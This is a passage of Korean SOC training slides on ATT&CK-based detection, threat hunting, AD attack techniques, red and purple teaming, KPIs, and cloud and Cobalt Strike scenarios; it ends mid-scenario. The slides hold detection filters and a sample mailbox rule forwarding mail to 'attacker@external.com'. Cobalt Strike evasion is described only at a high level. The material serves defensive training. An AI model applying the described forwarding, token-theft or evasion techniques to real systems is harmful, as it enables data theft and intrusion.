내부 시스템 간 통신 빈도 분포 → 드문 통신 쌍 식별
프로세스 실행 빈도 → 한 번만 실행된 비정상 바이너리
사용자 접근 파일 패턴 → 평소 접근 안 하던 폴더 접근

# Long Tail 분석 쿼리 (Splunk) # 30일 중 1회만 실행된 프로세스 찾기 index=sysmon EventCode=1 earliest=-30d | stats count by Image | where count = 1 | sort -count # 결과: 한 번만 실행된 실행 파일 목록 # 악성 코드는 한 번 실행하고 삭제하는 경우 많음

통계적 베이스라인 활용

시간별 로그인 건수 표준편차: 평균 ± 3σ 범위 이탈 시 이상 감지
DNS 쿼리 엔트로피: 높은 엔트로피 서브도메인 = DGA 후보
파일 접근 벡터 거리: 오늘 접근 파일 패턴 vs 지난달 패턴 유사도
프로세스 실행 시간 분포: 새벽 비정기 실행 = 이상 신호

💡 엔트로피 계산 (도메인 DGA 탐지):
높은 엔트로피 = 랜덤 문자열 = DGA 후보
"google.com" → 낮은 엔트로피 (의미 있는 단어)
"xk3a9d.com" → 높은 엔트로피 (무작위 문자)

보강 설명 단순 키워드 매칭을 넘어 통계적 방법으로 이상을 탐지하는 방법입니다. 빈도 분석, 표준편차, 엔트로피 계산 등의 통계 기법을 탐지에 적용하는 방법을 다룹니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

통계적 탐지빈도 분석표준편차

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
통계적 탐지·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

최종 실습: ATT&CK 기반 보안 운영 계획 수립 (25분)

가상 조직의 SOC 리더로서 — 1년 ATT&CK 기반 보안 운영 계획을 작성하라

최종 종합 실습

가상 조직 배경

국내 금융사 B사. 직원 500명. Windows AD 환경. AWS 클라우드 일부 활용. EDR 보유하나 CASB 미보유. 현재 Coverage 전체 분석 미실시. 지난해 피싱 인시던트 2건 발생. SOC 4명 운영 중.

계획 포함 항목

① 현재 Coverage 추정 및 공백 식별 (Top 5)
② Q1~Q4 분기별 탐지 개선 목표
③ 월간 헌팅 캠페인 1년 일정
④ Purple Team 계획 (분기 또는 반기)
⑤ 경영진 보고 KPI 3개 선정

작성 힌트

금융사 → Lazarus, APT38 같은 금융 타겟 APT TTP 기반 우선순위
피싱 인시던트 2건 → T1566 Coverage 강화 최우선
CASB 미보유 → 클라우드 Exfiltration 탐지 공백
SOC 4명 → 자동화 비중 높여야 유지 가능
금융 규제 → ISMS-P + 전자금융감독규정 Coverage 필수

⏱️ 시간 배분: 조사·계획 15분 → 문서 정리 5분 → 발표 준비 5분
발표는 팀당 3분 (계획 요약 + 이유 설명)

보강 설명모듈 전체를 종합하는 최종 실습입니다. 가상의 조직을 대상으로 ATT&CK 기반 보안 운영 계획을 수립합니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

T1566보안 운영 계획ATT&CK 기반

설명 확장

T1566 기준으로 첫 단서를 먼저 분류하기
보안 운영 계획를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

위협 모델링: STRIDE × ATT&CK 연계

설계 단계에서 잠재 위협을 식별하고 ATT&CK으로 탐지 요구사항을 도출한다

위협 모델링

STRIDE	의미	연관 ATT&CK Tactic	설계 시 탐지 요구사항
Spoofing	신원 위장	Initial Access (T1566, T1078)	DKIM/SPF 검증, MFA, UEBA
Tampering	데이터 변조	Impact (T1485, T1491)	파일 무결성 모니터링, 감사 로그
Repudiation	행위 부인	Defense Evasion (T1070)	변경 불가 로그, 디지털 서명
Information Disclosure	정보 유출	Collection, Exfiltration	DLP, CASB, 암호화 검증
Denial of Service	서비스 거부	Impact (T1498, T1499)	트래픽 이상 탐지, Rate Limiting
Elevation of Privilege	권한 상승	Privilege Escalation	권한 변경 감사, 최소 권한 정책

위협 모델링 → ATT&CK Coverage 도출

1단계: 시스템 아키텍처 다이어그램 작성 (신뢰 경계 표시)
2단계: 각 컴포넌트에 STRIDE 위협 식별
3단계: 각 위협을 ATT&CK Technique로 매핑
4단계: 해당 Technique의 현재 Coverage 확인
5단계: Coverage 공백 = 신규 탐지 요구사항

💡 실무 팁: 신규 서비스 출시 전 위협 모델링을 SOC와 공동으로 진행하면, 서비스 오픈과 동시에 탐지 룰을 배포할 수 있음

보강 설명 위협 모델링은 아키텍처 설계 단계에서 잠재적 위협을 식별하는 방법입니다. STRIDE 모델과 ATT&CK을 연계해 설계 단계에서 탐지 요구사항을 도출하는 방법을 다룹니다. 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

위협 모델링STRIDEATT&CK 연계

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
위협 모델링·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

네트워크 트래픽 분석 심화: 패킷 레벨 분석

Wireshark로 C2 트래픽·DNS 터널링·비정상 TLS를 직접 확인하는 방법

네트워크 분석 심화

Wireshark 핵심 필터 (ATT&CK 탐지용)

# C2 HTTP Beaconing 탐지 http.request && ip.dst != 내부IP && !알려진IP # DNS Tunneling 의심 (긴 서브도메인) dns && dns.qry.name matches ".{40,}" # TLS 자체 서명 인증서 탐지 tls.handshake.type == 11 && !tls.handshake.cert.issuer contains "DigiCert" # ICMP 데이터 포함 (ICMP 터널링) icmp && data.len > 64 # 비정상 포트 사용 !tcp.port in {80 443 53 22 25 110} && ip.dst != 내부IP

패킷 분석으로 알 수 있는 ATT&CK 지표

Beaconing 주기: 패킷 타임스탬프로 정확한 주기 측정
C2 프로토콜: HTTP 헤더, TLS SNI, DNS 타입으로 채널 파악
데이터 볼륨: 아웃바운드 패킷 크기 합산으로 유출량 추정
JA3 핑거프린트: TLS 클라이언트 특성으로 악성 도구 식별
페이로드 분석: HTTP Body에서 인코딩된 명령 확인

💡 실습 도구:
Wireshark (GUI 패킷 분석)
tshark (CLI 기반, 자동화 가능)
NetworkMiner (네트워크 포렌식 특화)
Zeek (대량 트래픽 분석·로그 생성)

보강 설명 Wireshark를 이용한 네트워크 패킷 분석의 기초를 다룹니다. DNS 터널링, C2 HTTP 트래픽, 비정상 TLS 핸드셰이크를 패킷 레벨에서 분석하는 방법입니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

Wireshark패킷 분석DNS 터널링

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

Active Directory 심층 보안: 공격과 방어 전략

AD는 공격자의 최종 목표 — Tiered 관리 모델로 권한 남용을 구조적으로 차단한다

AD 보안 심화

AD 주요 공격 기법 정리

공격	ATT&CK	설명
Kerberoasting	T1558.003	서비스 계정 TGS 크랙
AS-REP Roasting	T1558.004	사전인증 불필요 계정 공격
Pass-the-Hash	T1550.002	NTLM 해시로 인증
Pass-the-Ticket	T1550.003	Kerberos 티켓 재사용
Golden Ticket	T1558.001	krbtgt 해시로 위조 TGT
Silver Ticket	T1558.002	서비스 계정으로 위조 TGS
DCSync	T1003.006	복제 권한으로 해시 추출
AdminSDHolder 남용	T1098	권한 있는 그룹 멤버 추가

AD 보안 강화 핵심 원칙

Tiered Admin Model: Tier 0(DC·AD), Tier 1(서버), Tier 2(워크스테이션) 분리 — 각 계층 관리자 계정 별도 운영
Protected Users 그룹: 임원·DA 계정 추가 → Kerberos 보호, 자격증명 캐시 금지
Credential Guard: Hyper-V 격리로 LSASS 메모리 보호 → Pass-the-Hash 차단
Fine-grained Password Policy: 특권 계정 강력한 비밀번호 요구
LAPS: 로컬 관리자 비밀번호 자동 순환

🚨 즉시 조치 3가지:
① krbtgt 비밀번호 정기 변경 (분기 1회)
② 사용하지 않는 서비스 계정 SPN 제거
③ 도메인 관리자 그룹 최소화 (5명 미만)

보강 설명 Active Directory는 기업 환경의 핵심 인증 인프라로 공격자의 주요 타겟입니다. Kerberoasting, DCSync, Golden/Silver Ticket 외에 AD… 대표 예시와 연결해 기억하면 이해가 더 오래 남습니다.

Active Directory…AD 공격Tiered Admin Model

이해 포인트

Active Directory 보안를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

ATT&CK 기반 Red Team 계획: 적대적 시뮬레이션

단순 취약점 스캔이 아닌 실제 APT TTP를 에뮬레이션하는 목표 기반 공격 시뮬레이션

Red Team

ATT&CK 기반 Red Team 계획 구조

목표 정의: "도메인 관리자 권한 획득"이 아닌 "임원 이메일 접근" 같은 비즈니스 목표

위협 행위자 선택: 조직 업종 타겟 APT 그룹 선정 → TTP 에뮬레이션 대상

시나리오 설계: 선택한 APT TTP를 기반으로 공격 경로 설계 (ATT&CK 매핑)

범위·규칙 합의: 금지 사항, 공격 제외 시스템, 비상 중단 절차 사전 합의

실행 및 보고: 단계별 ATT&CK 매핑 결과 + 탐지 여부 + 개선 권고

Red Team 보고서 핵심 구성

Executive Summary: 목표 달성 여부, 주요 발견 사항
공격 타임라인: 단계별 행위와 ATT&CK 매핑
탐지 여부 분석: SOC가 탐지한 것 vs 놓친 것
탐지 공백 원인: 로그 미수집? 룰 없음? 오탐 필터?
개선 권고: 단기/중기/장기 보완 계획
Coverage 점수: 이번 Red Team 기준 업데이트

💡 Purple Team과의 차이:
Red Team = 몰래 공격, 탐지 여부 사후 확인
Purple Team = 공개 협력, 탐지 실패 즉시 개선
→ 성숙한 SOC는 두 가지를 번갈아 운영

보강 설명 Red Team 모의해킹을 ATT&CK 기반으로 계획하는 방법입니다. 단순 침투 테스트가 아닌 실제 공격자 TTP를 에뮬레이션하는 적대적 시뮬레이션 방법을 다룹니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

Red Team적대적 시뮬레이션TTP 에뮬레이션

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

보안 지표(KPI) 설계: ATT&CK 기반 실질 측정

경보 건수가 아닌 탐지 역량으로 — ATT&CK Coverage와 연계된 의미 있는 KPI

보안 KPI

KPI 이름	측정 방법	목표값	개선 방법
Coverage Score 3 비율	검증된 Technique / 전체 대상 Technique	연말 50% 이상	Purple Team 정기 실시
탐지 시간 (MTTD)	공격 시작 → 첫 경보까지 평균 시간	< 4시간	실시간 탐지 룰 추가
대응 시간 (MTTR)	첫 경보 → 봉쇄 완료까지 평균 시간	< 8시간	SOAR 플레이북 자동화
오탐률	오탐 경보 / 전체 경보	< 40%	주간 룰 튜닝 회의
미탐 고위험 Technique	Coverage 0인 고위험 Technique 수	0개 목표	분기 Coverage 분석
헌팅 캠페인 수행률	계획 대비 실제 수행 비율	80% 이상	월간 헌팅 시간 확보

KPI 설계 원칙

측정 가능: 명확한 데이터 소스와 계산 방법
개선 가능: 팀 노력으로 실제로 개선될 수 있는 것
비즈니스 연결: 경영진이 이해하는 언어로 표현 가능
조작 방지: KPI를 위해 탐지 품질을 희생하는 함정 경계

⚠️ 나쁜 KPI 예시:
"경보 처리 건수 증가" → 오탐 룰 추가로 부풀리기 가능
"취약점 스캔 건수" → 실제 위협 탐지와 무관
→ ATT&CK Coverage 기반 지표는 이런 함정을 줄여줌

보강 설명 ATT&CK 기반 SOC KPI를 설계하는 방법입니다. 단순 경보 건수나 처리 건수를 넘어 실질적인 보안 역량을 측정하는 지표를 다룹니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

SOC KPIATT&CK 기반 지표MTTD MTTR

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
SOC KPI·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

실습: 경영진 보고 발표 훈련 (10분)

기술 분석 결과를 경영진이 이해하는 비즈니스 언어로 번역해 3분 발표하라

경영진 보고 훈련

훈련 배경 (팀 과제 시나리오 기반)

앞서 분석한 3일 침해 시나리오 결과를 CISO에게 보고해야 합니다. CISO는 ATT&CK을 모르며, 비즈니스 영향과 대응 비용, 재발 방지 투자에 관심이 있습니다.

3분 발표 구성

1분: 무슨 일이 있었나 (ATT&CK 없이, 비즈니스 영향 중심)
1분: 지금 어떤 상태인가 (봉쇄 현황, 잔존 위험)
1분: 무엇이 필요한가 (투자 권고, 우선순위, 기대 효과)

기술 → 비즈니스 언어 번역 예시

기술 표현	비즈니스 표현
T1566.001 Spearphishing	악성 이메일 첨부파일로 시스템 침투
T1003.001 LSASS Dump	직원 비밀번호 전체 탈취 가능 상태
T1567.002 Exfiltration	엔지니어링 기밀 8.4GB 외부 유출
Coverage Score 1	공격을 탐지할 로그는 있지만 자동 경보가 없는 상태
Purple Team	모의 공격으로 우리 탐지 능력 검증

✅ 좋은 권고안 형식:
"CASB 도구 도입 시 클라우드 데이터 유출 탐지가 가능해집니다. 예상 투자비 연 5천만원, 현재 미탐지로 인한 잠재 피해 규모는 수억원 수준입니다."

보강 설명 ATT&CK 분석 결과를 경영진에게 효과적으로 보고하는 훈련입니다. 기술 용어를 비즈니스 언어로 번역하고 의사결정을 위한 명확한 권고안을 제시하는 방법을 연습합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

경영진 보고 훈련비즈니스 언어 번역권고안 제시

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
경영진 보고 훈련를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

보안 인식 교육과 ATT&CK 연계

일반 직원도 공격 체인의 첫 번째 방어선 — ATT&CK 개념을 쉬운 언어로 교육한다

보안 문화

직원 대상 교육 핵심 주제 (ATT&CK 연계)

피싱 식별 (T1566): "이메일의 발신자 도메인이 이상하면 클릭 금지" — DKIM 설명 없이 행동 중심으로
비밀번호 관리 (T1110): "같은 비밀번호를 여러 곳에 쓰면 한 곳 유출이 전체 피해로" — Password Spraying 설명 없이 결과로
이상 행동 신고 (T1078): "내가 로그인한 적 없는데 알림이 오면 즉시 신고" — Valid Accounts 탐지의 사용자 역할
USB 보안 (T1025): "모르는 USB는 절대 꽂지 말기" — Removable Media 공격
화면 잠금 (T1003): "자리 비울 때 화면 잠금" — 로컬 자격증명 보호

직원 신고 체계 구축

피싱 신고 버튼: 이메일 클라이언트에 "피싱 신고" 버튼 설치 → SOC 자동 알림
이상 로그인 알림: "귀하의 계정이 새 위치에서 로그인되었습니다" 알림 → 본인 확인 요청
핫라인: SOC 직통 전화번호 전 직원 고지
피드백: 신고 후 "잘 신고하셨습니다 / 정상이었습니다" 회신 → 신고 문화 강화

✅ 보안 문화 KPI:
월간 피싱 신고 건수 / 모의 피싱 클릭률 추이 / 이상 로그인 자가 신고율 — 이 지표가 올라갈수록 SOC의 탐지 부담이 줄어듦

보강 설명 임직원 보안 인식 교육에 ATT&CK 개념을 쉽게 녹여내는 방법입니다. 피싱, 소셜 엔지니어링, 이상 행동 신고 등 사용자 관점의 보안 교육을 ATT&CK과 연결합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

보안 인식 교육피싱 교육소셜 엔지니어링

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

치트시트 6: 경보 수신 시 분석가 판단 프레임워크

어떤 경보든 이 프레임으로 분석하면 놓치지 않는다 — 습관이 역량이 된다

치트시트

경보 수신 즉시 — 5W1H 분석

WHO

누가? 어떤 사용자·IP·시스템에서 발생했는가? 정상 사용자인가?

WHAT

무엇을? 어떤 행위가 탐지되었는가? ATT&CK Technique는?

WHEN

언제? 업무 시간인가? 이 사용자의 평소 활동 시간인가?

WHERE

어디서? 어떤 시스템에서? 평소 접속 위치인가?

WHY

왜? 정상 업무 사유가 있는가? 공격 목적은 무엇인가?

HOW

어떻게? 어떤 경로·도구로? 연관 이벤트가 있는가?

판단 → 액션 매트릭스

판단 결과	즉각 액션	다음 단계
정탐 High Confidence	격리·차단 + 경영진 알림	IR 플레이북 실행
정탐 Medium Confidence	모니터링 강화 + 추가 조사	증거 수집 → 판단 업그레이드
오탐 확인됨	경보 종결 + 오탐 원인 기록	룰 튜닝 검토
판단 불가	시니어 에스컬레이션	추가 로그 수집 요청

황금 원칙: "모르면 에스컬레이션하라, 놓치는 것이 과잉 대응보다 훨씬 더 위험하다"

보강 설명분석가가 경보를 받았을 때 체계적으로 판단하는 프레임워크입니다. 이 프레임워크를 습관으로 만들면 어떤 경보를 받아도 구조적으로 분석할 수 있습니다. 정의·대표 Technique·추가 질문을 함께 정리해 두면 복습 효율이 올라갑니다.

분석가 판단 프레임경보 처리 절차5W1H 분석

복습 포인트

분석가 판단 프레임 핵심 정의를 한 문장으로 다시 말하기
경보 처리 절차와 연결되는 대표 로그 또는 사례 1개 떠올리기
다음 슬라이드로 이어지는 질문을 스스로 만들기

암기보다 이해

왜 필요한지와 무엇을 판단하는지 구분하기
용어-목적-근거를 세 칸 표처럼 정리하기
팀원에게 설명해 보며 빈 구간을 찾기

학습 요소

5W1H 분석 관련 ATT&CK ID·로그·조치를 묶어 기억하기
오탐 가능성과 탐지 공백도 함께 적어 두기
실제 현업 사례 1개와 연결해 기억 강화

ATT&CK 실무 핵심 20가지 — 책상 참조 카드

이 20가지를 체화하면 매일의 SOC 업무 품질이 달라진다

종합 참조 카드

ATT&CK은 판단을 구조화하는 도구, 정답표가 아니다

Tactic(왜) → Technique(어떻게) → Sub-tech(세부) 계층 항상 구분

매핑에는 근거 로그 + Confidence 수준을 반드시 함께 기록

공격은 체인이다 — 단일 이벤트가 아니라 흐름으로 읽어라

로그는 Technique를 직접 말하지 않는다 — 분석가가 해석해야 한다

Coverage = 룰 개수가 아닌 검증된 탐지 품질(0~3점)로 측정

멀티시그널(다중 센서) 교차 분석 = Confidence 상승의 핵심

맥락(시간·위치·행동 패턴)이 오탐과 정탐을 가른다

탐지 룰 = Technique를 운영 가능한 조건으로 번역한 결과

룰 품질 = 정탐률 × 재현율 × 속도 × 검증 여부

Hunting = 경보를 기다리지 않고 가설로 탐지 공백을 찾는 일

Purple Team = Coverage 2(미검증) → 3(검증)의 핵심 과정

Credential Access 탐지 시 다음에 볼 것 = Lateral Movement + Collection

Beaconing 탐지 = 주기성 + 크기 일정 + 희귀 도메인 3가지 교차

Password Spraying = 수평 시도, 계정 잠금 없음 — 임계값 다르게 설정

소급 탐지를 위해 최소 6개월 Hot/Warm 로그 유지

경보 피로 방지 = 주간 오탐 TOP 10 룰 의무 튜닝

30초 보고 = 시작 → 진행(ATT&CK) → 영향 → 다음 행동

Coverage 공백 = 신규 로그 수집 + 탐지 룰 + Purple Team 백로그

좋은 SOC = ATT&CK으로 설명하고, 로그로 증명하고, 액션으로 끝낸다

보강 설명 모듈 전체를 통해 가장 중요한 20가지 실무 포인트를 한 장에 정리합니다. 이 슬라이드를 인쇄해서 책상에 붙여두면 실무에 바로 도움이 됩니다. 대표 예시와 연결해 기억하면 이해가 더 오래 남습니다.

실무 핵심 20가지종합 정리책상 참조카드

이해 포인트

실무 핵심 20가지를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

수강생 셀프 체크: 나는 이것을 할 수 있는가?

✅이 붙으면 역량 습득 완료 — ☐이면 해당 파트 복습 권장

셀프 평가

 매핑 역량
☐ 로그를 보고 Tactic·Technique를 즉시 매핑할 수 있다
☐ 매핑에 근거 로그와 Confidence를 함께 기록할 수 있다
☐ 공격 체인을 시간 순서로 재구성할 수 있다
☐ 14개 Tactic과 핵심 Technique를 설명할 수 있다
☐ Tactic vs Technique vs Sub-technique를 구분한다


 탐지·헌팅 역량
☐ ATT&CK 기반 SIEM 탐지 룰을 설계할 수 있다
☐ 오탐을 줄이는 튜닝 방법을 적용할 수 있다
☐ 헌팅 가설을 수립하고 플레이북으로 문서화할 수 있다
☐ Coverage 분석으로 탐지 공백을 식별할 수 있다
☐ Purple Team을 기획·실행할 수 있다


 보고·운영 역량
☐ 30초 구두 보고 문장을 작성할 수 있다
☐ 경영진 보고를 비즈니스 언어로 작성할 수 있다
☐ 사고 보고서(기술·경영진용)를 구분해 작성할 수 있다
☐ Coverage 개선 로드맵을 분기별로 수립할 수 있다
☐ ATT&CK 기반 SOC KPI를 설계할 수 있다

🎓 수료 기준: 각 카테고리에서 3개 이상 체크 = 기본 역량 달성. 모든 항목 체크 = 실무 투입 준비 완료. 체크 못 한 항목은 해당 파트를 복습하고 DetectionLab 실습으로 보완하세요.

보강 설명 수강생이 스스로 이번 모듈에서 배운 내용을 점검하는 셀프 체크 슬라이드입니다. 각 항목에 체크할 수 있으면 해당 역량을 습득한 것입니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

셀프 체크역량 확인수료 기준

이해 포인트

셀프 체크를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
역량 확인 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

시나리오: Microsoft 365 Identity 침해 전체 체인

OAuth 피싱 → 토큰 탈취 → 메일 수집 → 내부 스피어피싱 — 클라우드 시대의 최신 공격 패턴

클라우드 시나리오 심화

T1566.002 — OAuth 피싱 링크

피해자에게 "Microsoft Teams 초대" 링크 발송 → 가짜 OAuth 동의 페이지 → 공격자 앱에 M365 접근 권한 부여

T1550.001 — 애플리케이션 토큰으로 접근

MFA 없이 Graph API로 M365 접근. 비밀번호 없이 refresh token으로 무기한 접근 가능

T1114.002 — 이메일 포워딩 규칙 설정

받은 편지함 자동 전달 규칙 → 공격자 외부 메일로 실시간 전달. OWA Inbox Rule 생성

T1213.002 — SharePoint·Teams 데이터 수집

Graph API로 SharePoint 사이트 목록, 파일 대량 다운로드, Teams 채팅 메시지 조회

T1534 — 내부 스피어피싱으로 확산

탈취한 CFO 계정으로 재무팀에게 내부 피싱 → BEC 금전 사기 또는 추가 계정 탈취

# Microsoft Entra ID 감사 로그 탐지 Operation: Consent to application Target: Unknown App (비공식 앱) Permissions: Mail.ReadWrite, Files.ReadWrite # → 광범위한 권한 동의 = 즉각 조사 # OWA 이메일 포워딩 규칙 탐지 Operation: New-InboxRule ForwardTo: attacker@external.com SubjectContainsWords: invoice, payment, wire # → 금융 키워드 포워딩 = BEC 준비

🚨 즉각 대응:
① 동의된 앱 권한 즉시 철회 (Entra ID → 앱 등록)
② 포워딩 규칙 즉시 삭제
③ 모든 세션 토큰 강제 만료
④ 계정 비밀번호 변경 + MFA 재등록

보강 설명 Microsoft 365 환경을 대상으로 한 Identity 침해 시나리오입니다. OAuth 토큰 탈취부터 메일 수집까지의 전체 체인을 ATT&CK으로 분석합니다. 최근 가장 빈번한 클라우드 공격 유형입니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1114T1550.001Microsoft 365

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1114 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

시나리오: Cobalt Strike Beacon 분석과 탐지

가장 많이 악용되는 C2 프레임워크 — Malleable C2로 탐지를 우회하는 패턴과 대응

C2 프레임워크 분석

Cobalt Strike Beacon 주요 특성

Malleable C2 프로파일: HTTP/S 트래픽 외관을 정상 트래픽으로 위장 (Amazon S3, Google Analytics, Twitter 등)
메모리 기반 실행: 디스크에 파일 없이 메모리에서만 실행 → 파일 기반 탐지 회피
Named Pipe 통신: 내부 이동 시 SMB Named Pipe 사용 → 네트워크 탐지 우회
Sleep + Jitter: 기본 60초 간격, 지터로 주기성 흐림 → Beaconing 탐지 어려움
Process Injection: 신뢰받는 프로세스에 인젝션해 탐지 우회

Cobalt Strike 탐지 전략

JA3/JA3S 핑거프린트: CS Beacon의 TLS 핸드셰이크 특성으로 식별
Named Pipe 패턴: \\.\pipe\MSSE-* 같은 CS 기본 파이프명 탐지
프로세스 인젝션: Sysmon EventID 8 (CreateRemoteThread) 모니터링
메모리 스캔: EDR의 메모리 스캐닝으로 CS 시그니처 탐지
HTTP 헤더 이상: Malleable 프로파일의 비정상 헤더 조합

💡 실무 팁: abuse.ch의 ThreatFox와 cs-canary 프로젝트에서 알려진 CS Team Server IP·인증서 정보 구독 → 실시간 차단 가능

보강 설명 Cobalt Strike는 가장 많이 악용되는 C2 프레임워크입니다. Beacon의 통신 패턴, 메모리 인젝션, Malleable C2 프로파일로 탐지를 우회하는 방법과 이에 대한 탐지 전략을 다룹니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

Cobalt StrikeBeaconMalleable C2

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

시나리오: 멀티클라우드 침해 — AWS에서 Azure로

한 클라우드의 자격증명으로 다른 클라우드까지 — 클라우드 간 이동 체인 분석

멀티클라우드 시나리오

AWS S3 버킷 미설정 → 자격증명 파일 노출

개발팀이 .env 파일을 공개 S3 버킷에 올림 → AWS Access Key 노출. 자동 스캐너(truffleHog)로 발견

T1580 — AWS 환경 열거 (Discovery)

탈취 키로 IAM, EC2, Secrets Manager 내용 조회. Secrets Manager에서 Azure Service Principal 크리덴셜 발견

T1078.004 — Azure 환경 침투 (Cloud Account)

